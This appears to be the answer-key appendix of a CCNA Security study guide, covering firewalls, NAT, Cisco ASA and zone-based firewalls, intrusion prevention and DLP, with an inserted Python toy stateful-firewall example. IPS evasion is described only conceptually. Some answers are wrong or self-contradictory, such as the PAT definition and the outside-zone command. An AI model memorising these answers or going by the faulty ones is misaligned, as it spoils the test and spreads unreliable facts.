8. C. Proxy servers can provide an additional beneficial function called web caching. When a proxy server is configured to provide web caching, it saves a copy of all web pages that have been delivered to internal computers in a web cache. If any user requests the same page later, the proxy server has a local copy and need not spend the time and effort to retrieve it from the Internet. This greatly improves web performance for frequently requested pages.
9. D. Circuit-level proxies operate at the Session layer (layer 5) of the OSI model. They make decisions based on the protocol header and Session layer information.
10. A. Although packet filtering firewalls serve an important function, they cannot prevent many attack types. They cannot prevent IP spoofing, attacks that are specific to an application, attacks that depend on packet fragmentation, or attacks that take advantage of the TCP handshake.
11. B. An application-level firewall maintains a different proxy function for each protocol. For example, for HTTP the proxy will be able to read and filter traffic based on specific HTTP commands.
12. C. A packet should never arrive at a firewall for delivery that has both the SYN flag and the ACK flag set unless it is part of an existing handshake process, and it should be in response to a packet sent from inside the network with the SYN flag set.
13. D. The firewall records all operations in its state table and will monitor that table whenever a packet arrives at the firewall to ensure that any packets permitted either are connection requests from the inside (SYN packets only) or are part of an existing connection and that all rules of the handshake are enforced.
14. A. While never a replacement for properly positioned network firewalls, personal firewalls are an excellent complement to the protection provided by the network firewalls, and installing both types of firewalls is an example of exercising the concept of defense in depth. This concept prescribes that you always deploy multiple barriers to unauthorized access.
15. B. A SOCKS firewall is an example of a circuit-level firewall. This requires a SOCKS client on the computers. Many vendors have integrated their software with SOCKS to make using this type of firewall easier.
16. B. A SYN/ACK packet in response to a SYN packet in a current connection setup is normal and would be allowed.
17. C. Proxy firewalls include SOCKS firewalls, circuit-level firewalls, and kernel-level firewalls.
18. D. While never a replacement for properly positioned network firewalls, personal firewalls are an excellent complement to the protection provided by the network firewalls, and installing both types of firewalls is an example of exercising the concept of defense in depth.
19. A. Operating at the Application layer requires each packet to be completely opened and closed, making this firewall the most impactful on performance.
20. B. Packet filtering firewalls inspect the header of the packet for allowed IP addresses or port numbers. Since these values reside at the Network and Transport layers, respectively, these firewalls operate at those layers.
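The state-table rules described in answers 6, 12, 13, and 16 above, worked through as an added Python example (not the book's code): a toy stateful filter that admits SYN-only packets from the inside, admits a SYN/ACK only as the reply to a recorded SYN, and expires idle entries. The idle timeout and the sample packets are assumptions constructed for the demonstration.

```python
"""Toy stateful packet filter: state table keyed by the 5-tuple, with
flags (connection state) and a timeout, as the answers above describe."""
from dataclasses import dataclass

SYN, ACK = 0x02, 0x10
IDLE_TIMEOUT = 60  # seconds an idle entry survives (assumed value)


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str      # only "tcp" is modelled here
    flags: int
    inbound: bool   # True = arrived on the outside (untrusted) interface


class StatefulFilter:
    def __init__(self):
        self.table = {}  # 5-tuple -> {"state": str, "expires": float}

    @staticmethod
    def key(p):
        return (p.src_ip, p.src_port, p.dst_ip, p.dst_port, p.proto)

    @staticmethod
    def reverse_key(p):
        return (p.dst_ip, p.dst_port, p.src_ip, p.src_port, p.proto)

    def process(self, p, now):
        """Return 'permit' or 'drop' for packet p seen at time `now`."""
        # Purge idle entries first (the timeout column of the state table).
        self.table = {k: v for k, v in self.table.items() if v["expires"] > now}
        syn, ack = bool(p.flags & SYN), bool(p.flags & ACK)
        if syn and not ack:
            # Only the inside may open a new connection (answer 13).
            if p.inbound:
                return "drop"
            self.table[self.key(p)] = {"state": "SYN_SENT", "expires": now + IDLE_TIMEOUT}
            return "permit"
        if syn and ack:
            # SYN/ACK is legal only as the reply to a SYN we recorded (12, 16).
            entry = self.table.get(self.reverse_key(p))
            if entry is None or entry["state"] != "SYN_SENT":
                return "drop"
            entry["state"], entry["expires"] = "SYN_RECEIVED", now + IDLE_TIMEOUT
            return "permit"
        # Everything else must belong to an existing connection.
        entry = self.table.get(self.key(p)) or self.table.get(self.reverse_key(p))
        if entry is None:
            return "drop"
        if entry["state"] == "SYN_RECEIVED" and ack and not p.inbound:
            entry["state"] = "ESTABLISHED"  # third step of the handshake
        entry["expires"] = now + IDLE_TIMEOUT
        return "permit"


def demo():
    """Constructed sample packets; returns the filter's decision for each."""
    fw = StatefulFilter()
    inside_syn = Packet("10.1.1.15", 40000, "203.0.113.7", 443, "tcp", SYN, False)
    reply = Packet("203.0.113.7", 443, "10.1.1.15", 40000, "tcp", SYN | ACK, True)
    final_ack = Packet("10.1.1.15", 40000, "203.0.113.7", 443, "tcp", ACK, False)
    unsolicited = Packet("198.51.100.9", 443, "10.1.1.20", 5555, "tcp", SYN | ACK, True)
    outside_syn = Packet("198.51.100.9", 5000, "10.1.1.20", 22, "tcp", SYN, True)
    return [fw.process(inside_syn, 0), fw.process(reply, 1), fw.process(final_ack, 2),
            fw.process(unsolicited, 3), fw.process(outside_syn, 4),
            fw.process(final_ack, 2 + IDLE_TIMEOUT + 1)]  # idle entry has expired
```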
Chapter 14: Configuring NAT and Zone-Based Firewalls
1. B. In static NAT, each private IP address is mapped to a public IP address. While this does not save any of the public IPv4 address space, it does have the benefit of hiding your internal network address scheme from the outside world.
2. D. The Manual NAT After Auto NAT section is read last and contains more general translations not handled by the first two sections. These are used only when no translation matches in the first two sections.
3. D. In some scenarios, you may need more options than are available with Auto NAT, or you may need to specify exceptions to the Auto NAT rules. By using the Manual NAT section, these options will be available to you.
4. C. The show xlate command on an ASA shows the translations that have occurred.
5. C. The r flag indicates that the translation is a PAT. The i flag indicates that the translation applies to the inside address port.
6. B. Zones are collections of networks reachable over a router interface.
7. D. A match statement is used to specify the traffic and can match traffic based on an ACL, protocol, or another class map.
8. C. The actions can be defined using action statements. The actions can be inspect (triggers stateful packet inspection), drop (denies traffic), or pass (permits traffic).
9. B. The self-zone is a special zone that has no interface members. It applies to any traffic destined for the router rather than traffic that the router is routing.
10. C. In PAT, each private IP address is mapped to a public IP address. While this does not save any of the public IPv4 address space, it does have the benefit of hiding your internal network address scheme from the outside world.
11. C. The value 21505 is the source port number selected by the device at 10.1.1.15 for the ICMP session.
12. D. When using the Cisco Common Classification Policy Language, class maps are used to define traffic classes.
13. B. Use the following command to create the zone called inside:
RTR64(config)# zone security inside
14. C. The self-zone is a special zone that has no interface members. It applies to any traffic destined for the router rather than traffic that the router is routing. An example of this type of traffic would be traffic to manage the device using SSH. It also applies to traffic generated by the router. The traffic going from the router back to the device making the SSH connection to manage the device would be an example of such router-generated traffic.
15. A. Applied at the interface configuration prompt, the command to assign an interface to the outside zone is as follows:
RTR64(config-if)# zone-member inside
16. C. When using the Cisco Common Classification Policy Language, class maps are used to define traffic classes, and policy maps are used to apply policies (actions) to these traffic classes.
17. A. Zone pairs are used to define a unidirectional firewall policy. The direction is indicated by specifying the source and destination zone.
18. A. The r flag indicates that the translation is a PAT. The i flag indicates that the translation applies to the inside address port.
19. A. In this section, also called object NAT, translations that are defined on the object itself are contained. These translations, one for each object, are typically either static translations for servers that must be reached from the outside world (and always require the same public IP address) or dynamic translations for clients trying to reach the Internet.
20. A. In dynamic NAT, a pool of public IP addresses is obtained that is at least equal to the number of private IP addresses that require translation. However, rather than mapping the private IP addresses to the public IP addresses, the NAT device maps the public IP addresses from the pool on a dynamic basis, much like a DHCP server does when assigning IP addresses.
Chapter 15: Configuring the Firewall on an ASA
1. A. Application Inspection Control (AIC), or application protocol control as it is also called, verifies the conformance of major application layer protocol operations to RFC standards.
2. B. In transparent mode, the ASA is not acting as a router and assumes a layer 2 identity much as a switch does. This makes the ASA transparent to devices on either side (from a layer 3 perspective); thus the name transparent mode.
3. C. In clustering, three or more security appliances are deployed as a single logical device. This allows for the management of the multiple ASAs as a unit. It provides increased throughput and redundancy.
4. A. The ASA can be partitioned into multiple virtual firewalls or security contexts. Each context can have its own interfaces, policies, and administrators.
5. B. The nameif command is used at the interface configuration prompt.
6. C. The http server enable command is required to start the HTTP service on the ASA.
7. D. The command http ip-address mask interface is used to define an IP address on the specified network that will be allowed to connect to the ASA using HTTP to manage the ASA.
8. A. Security levels define the trustworthiness of the interface. The higher the level, the more trusted the interface.
9. B. There is an implicit permit for traffic flowing from a high-security interface to a low-security interface. High and low are defined by the security value assigned.
10. C. The command security-level value is used at the interface configuration prompt.
11. A. You will need to create an access rule to allow traffic in each of the following scenarios: between interfaces of the same security level, and traffic from a lower-security interface to a higher-security interface.
12. B. In many cases we need to allow only a select group of devices rather than all devices, or we need to allow only devices on a specific network to send traffic on an interface when there are multiple networks that might be traversing that interface. To make the creation and application of rules easier, the ASA can also use an object-based model for certain rules.
13. D. In the Cisco Modular Policy Framework, class maps are used to categorize traffic types into classes.
14. A. On the Service Policy rule page, the Global radio button applies the policy to all interfaces.
15. B. You will need to create a network object to represent the 192.168.5.0/24 network, create a service object to represent HTTP, and create a host object to represent the server at 201.3.3.3.
16. C. In the Cisco Modular Policy Framework, service policies are used to specify where the policy map should be implemented.
17. B. Since outside has a security level of 0 and the dmz has a level of 50, traffic from the lower level (0) to the higher level (50) will be disallowed.
18. C. The command defines an IP address on the inside network (defined by the interface name) that will be allowed to connect to the ASA using either SSH or HTTP to manage the ASA.
19. C. In the Cisco Modular Policy Framework, policy maps are used to define the action to be taken for a class. Actions that can be specified are allow, block, and rate-limit.
20. D. There is an implicit deny for traffic flowing from a low-security interface to a high-security interface. High and low are defined by the security value assigned.
Chapter 16: Intrusion Prevention
1. A. A threat is an identified security weakness to which any specific environment may or may not be vulnerable. For example, a threat might exist in the form of a new attack on Oracle database servers, but if you use Microsoft SQL Server, it is a threat to which you are not vulnerable.
2. A. Actions refer to the operations an intrusion prevention system (IPS) can take when an attack is recognized to block the traffic. Drop means the IPS quietly drops the packets involved.
3. C. The ability to monitor any internal activity that occurs within a system, such as an attack against a system that is carried out by logging on to the system's local terminal, is a strength of host-based IPS and a weakness of network-based IPS.
4. A. The attack fragments the packet containing the malicious code so that it becomes difficult for the IPS to recognize the code in such a fragmented fashion.
5. D. There are four categories of functions of which FireSIGHT is capable. They include detection, learning, adapting, and acting. Blocking is a form of acting.
6. A. A zero-day threat is any threat not yet remediated by malware vendors or software vendors. This type of threat cannot be detected through attack signature-based methods and is usually only discovered by malware or IPS/IDS software that uses heuristics.
7. B. Cisco AMP for Endpoints is composed of connectors installed on endpoints. It uses a cloud-based detection process that offloads the detection burden to the cloud. Cisco AMP for Networks uses FirePOWER appliances to detect malware in transit.
8. A. The sensor is connected to a port on the switch to which all traffic has been mirrored by making the port a SPAN port.
9. C. Many protocols' information can be communicated or expressed in multiple ways. For example, HTTP can accept strings expressed in hexadecimal, Unicode, or standard text expressions. Attackers can use this to evade an IPS sensor. If the IPS cannot perform protocol normalization (decoding the payload to discover its significance), this attack may succeed.
10. C. A vulnerability is any susceptibility to an external threat that a device or system may possess. A threat only becomes a vulnerability when the threat target is present in your environment and is in the state required to take advantage of the vulnerability.
11. C. Actions refer to the operations an intrusion prevention system (IPS) can take when an attack is recognized. Shun sends a packet with the RST flag when a non-TCP connection is encountered.
12. C. In this mode, the sensing device is placed in the line of traffic and analyzes the original traffic, not a copy, in real time. Therefore, it can take actions on the traffic, allowing it to operate as a true IPS.
13. A. One of the options is to place the sensor outside the perimeter firewall (ASA). When placed here, the sensor will generate a very high number of alarms because this is an exposure to the most untrusted network, the Internet.
14. D. An exploit occurs when a threat and vulnerability both exist and a threat actor takes advantage of the situation. The term exploit also refers to the specific tool or attack methodology used.
15. D. Actions refer to the operations an intrusion prevention system (IPS) can take when an attack is recognized. When blocking, the IPS directs another device (a router or firewall) to block the traffic.
16. B. The tap is placed between the router and the layer 3 switch. It provides full-duplex connectivity between the devices and splits off two simplex mirrors of the full-duplex traffic. All traffic between the two devices must traverse the sensor.
17. A. The attacker injects a bogus string into the attack code and breaks the attack into fragments. Then he manipulates the TTL value of the fragment containing the bogus string in such a way that the fragment dies (and never gets delivered) before it reaches the destination. If the IPS does not consider the fragment offset values or TTL values, it will detect the bogus string rather than the actual payload. The result is that after inspection by the IPS, the bogus string does not get delivered; the attack payload does.
18. C. The inability to monitor any internal activity that occurs within a system, such as an attack against a system that is carried out by logging on to the system's local terminal, is a strength of host-based IPS and a weakness of network-based IPS.
19. B. Actions refer to the operations an intrusion prevention system (IPS) can take when an attack is recognized. Reset sends a packet with the RST flag that ends any TCP connection.
20. B. A risk is created when a threat exists to which a system is vulnerable.
Chapter 17: Content and Endpoint Security
1. B. Reputation-based filtering relies on the identification of email servers that have become known for sending spam. When a system can do this, it must rely on some service for developing these "reputations."
2. A. Data leakage occurs when sensitive data is disclosed to unauthorized personnel either intentionally or inadvertently. Data loss prevention (DLP) software attempts to prevent data leakage.
3. B. Network DLP is installed at network egress points near the perimeter, where it analyzes network traffic.
4. A. Precise methods involve content registration and trigger almost zero false-positive incidents.
5. A. If the sender score is between −1 and +10, the email is accepted. If it is between −1 and −3, the email is accepted, but additional emails are throttled. If it is between −10 and −3, it is blocked.
6. A. Advanced Malware Protection (AMP) is the malware component in ESA that uses a combination of several technologies to protect you from email-based malware.
7. A. File reputation sends a fingerprint of every file that traverses the Cisco email security gateway to AMP's cloud-based intelligence network for a reputation verdict. Based on these results, you can block malicious files identified as having a bad reputation.
8. B. The Cisco Web Reputation System (WBRS) uses real-time analysis on a vast, diverse, and global dataset to detect URLs that contain some form of malware. WBRS is a critical part of the Cisco security database, which protects customers from blended threats from email or web traffic.
9. C. The Cisco Web Security Appliance (WSA) is a web proxy that integrates with other network components to monitor and control outbound requests for web content. Traffic can be directed to the WSA explicitly on the end host or by using the Web Cache Control Protocol on an inline device like the perimeter router.
10. A. By leveraging Cisco Security Intelligence Operations (SIO), Cisco IronPort reputation filters analyze more than 50 web and network parameters to evaluate a website's trustworthiness.
11. C. If the sender score is between −1 and +10, the email is accepted. If it is between −1 and −3, the email is accepted, but additional emails are throttled. If it is between −10 and −3, it is blocked.
12. C. In the safe sandboxed environment, AMP can obtain details about the threat level of the malware and communicate that information to the Cisco Talos intelligence network to update the AMP cloud data for all.
13. C. The WSA anti-malware system uses multiple scanning engines in a single appliance. It uses the Dynamic Vectoring and Streaming Engine and verdict engines from both Webroot and McAfee.
14. D. WSA uses Application Visibility and Control (AVC) to allow for the control of the use of web applications. Granular policy control allows administrators to permit the use of applications such as Dropbox or Facebook while blocking users from activities such as uploading documents or clicking the Like button.
15. B. The main task of Cisco ISE is to manage access to the network, but its abilities go beyond that. It can provide AAA services so that you can deploy 802.1x security. Using Cisco TrustSec technology, it also can enforce endpoint security policies that ensure that many of the security measures in this section are compliant with the policy.
16. B. File retrospection allows for the identification and removal of these files later. If malicious behavior is spotted later, AMP sends a retrospective alert so that you can contain and remediate the malware.
17. B. If the sender score is between −1 and +10, the email is accepted. If it is between −1 and −3, the email is accepted, but additional emails are throttled. If it is between −10 and −3, it is blocked.
18. C. Imprecise methods can include keywords, lexicons, regular expressions, extended regular expressions, metadata tags, Bayesian analysis, and statistical analysis.
19. C. Endpoint DLP runs on end-user workstations or servers in the organization.
20. A. Context-based filtering filters the message and attachments for sender identities, message content, embedded URLs, and email formatting. These systems use algorithms to examine these items to identify spam.
Comprehensive Online Learning Environment
Register to gain one year of FREE access to the online interactive learning environment and test bank to help you study for your CCNA Security certification exam—included with your purchase of this book!
The online test bank includes the following:
Assessment Test to help you focus your study to specific objectives
Chapter Tests to reinforce what you've learned
Practice Exams to test your knowledge of the material
Digital Flashcards to reinforce your learning and provide last-minute test prep before the exam
Searchable Glossary to define the key terms you'll need to know for the exam
Register and Access the Online Test Bank
To register your book and get access to the online test bank, follow these steps:
1. Go to bit.ly/SybexTest.
2. Select your book from the list.
3. Complete the required registration information, including answering the security verification proving book ownership. You will be emailed a PIN code.
4. Go to http://www.wiley.com/go/sybextestprep, find your book on that page, and click the "Register or Login" link under your book.
5. If you already have an account at testbanks.wiley.com, log in and then click the "Redeem Access Code" button to add your new book with the PIN code you received. If you don't have an account already, create a new account and use the PIN code you received.
WILEY END USER LICENSE AGREEMENT
Go to www.wiley.com/go/eula to access Wiley's ebook EULA.